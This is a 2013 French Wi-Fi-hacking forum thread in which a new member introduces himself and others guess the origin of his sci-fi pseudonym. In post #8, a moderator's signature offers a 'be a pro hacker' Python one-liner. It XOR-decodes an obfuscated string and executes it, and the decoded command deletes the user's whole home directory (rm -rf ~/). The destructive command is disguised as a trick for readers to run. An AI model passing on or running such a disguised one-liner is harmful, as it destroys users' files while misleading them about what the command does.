Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 10-03-2013 00:06:47

le dirdir
Membre d'Or

Le dirdir vous salue

Salut à tous.

Ça faisait quelque temps (quelques années, je crois) que je traine sur ce forum, en tant que spectateur.

J'y ai eu des lectures parfois passionantes et souvent instructives.

Je me décide enfin à m'inscrire.

Je suis pasionné d'informatique depuis toujours, et de sécurité, forcement.

Ce que j'ai appris ici et ailleurs, forum backtrack, forum aircrack, secuobs, m'a sauvé la mise plusieurs fois, en particulier quand on a tenté une attaque de type SET sur ma boite mail.

Voilà, pas grand chose d'autre à dire sur moi, à part peur-être une passion pour la bière et la science fiction (voir mon pseudo) mais je pense que c'est le cas de tous les passionnés d'informatique.

smile

Tant vaut l'antenne, tant vaut le poste

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 10-03-2013 14:50:52

kcdtv
Membre d'honneur
Lieu : Internacionaluña

Re : Le dirdir vous salue

Au plaisir de te souhaiter la bienvenue. smile

Voilà, pas grand chose d'autre à dire sur moi, à part peur-être une passion pour la bière et la science fiction (voir mon pseudo) mais je pense que c'est le cas de tous les passionnés d'informatique.

Ça semble évident maintenant que tu le dis... c'est donc lié... merci pour m'apprendre à mieux me comprendre tongue

#3 14-03-2013 04:35:45

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell

Ça faisait quelque temps (quelques années, je crois) que je traine sur ce forum, en tant que spectateur.

Cela fait des années que tu nous espionnes ? kcdtv il faut le mettre en garde à vue pour 24 H de ban tongue

Bienvenue à toi Le dirdir smile

#4 14-03-2013 09:14:14

kcdtv
Membre d'honneur

Je lui épargne le ban si il nous rappelle qui est le dirdir... J'ai un trou de mémoire, ça m'évoque  l'excellentissime  Philip K. Dick.... C'est ça?

#5 14-03-2013 22:05:36

le dirdir
Membre d'Or

Fuji a écrit :

Cela fait des années que tu nous espionnes ?

The quieter you become, the more you are able to hear

Fuji a écrit :

kcdtv il faut le mettre en garde à vue pour 24 H de ban tongue

Y a le WIFI dans la cellule ?

kcdtv a écrit :

Je lui épargne le ban si il nous rappelle qui est le dirdir... J'ai un trou de mémoire, ça m'évoque  l'excellentissime  Philip K. Dick.... C'est ça?

Perdu.

Indice : pnume.

#6 15-03-2013 09:36:59

kcdtv
Membre d'honneur

J'y arrive paaaaaaas tongue
Mainetenant changement de registre et je pense à lanfeust des étoiles: c'est pas le petit être blanc qui vaut la peau des fesses?
Mais Qui est donc le dirdir ??? (vous pouvez participer à notre grand jeu crack-wifi.com, il et interdit de chercher dans google, sinon c'est ps drôle )

#7 15-03-2013 13:17:25

le dirdir
Membre d'Or

Toujours pas.

C'est tiré d'une quadrilogie, une des œuvres majeures de la science-fiction, pourtant quasi-inconnue du grand public.

Indice 2  : wankh

#8 15-03-2013 13:42:30

spawn
Modérateur

chasch

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#9 15-03-2013 13:47:10

kcdtv
Membre d'honneur

J'étais bien partit en vrille donc avec lanfeust de étoiles--- Il me paraissait que la fille s'appelait pnune ou prune
Mon troisième essai  :p
AE van VOGT avec les livres en relation avec "le monde A"

#10 15-03-2013 14:11:58

le dirdir
Membre d'Or

Même époque, auteur avec un nom qui ressemble un peu, mais un style résolument différent. ses œuvres tiennent plus du polar ou du roman d'aventure, même si il passe allègrement d'une planète à l'autre, en décrivant des mondes et des cultures avec une foulititude de détails.

troisième indice

Annonce

Pied de page des forums

Le coin des bonnes affaires, achats informatiques:

|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   

Server Stats - [ Generated in 0.026 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]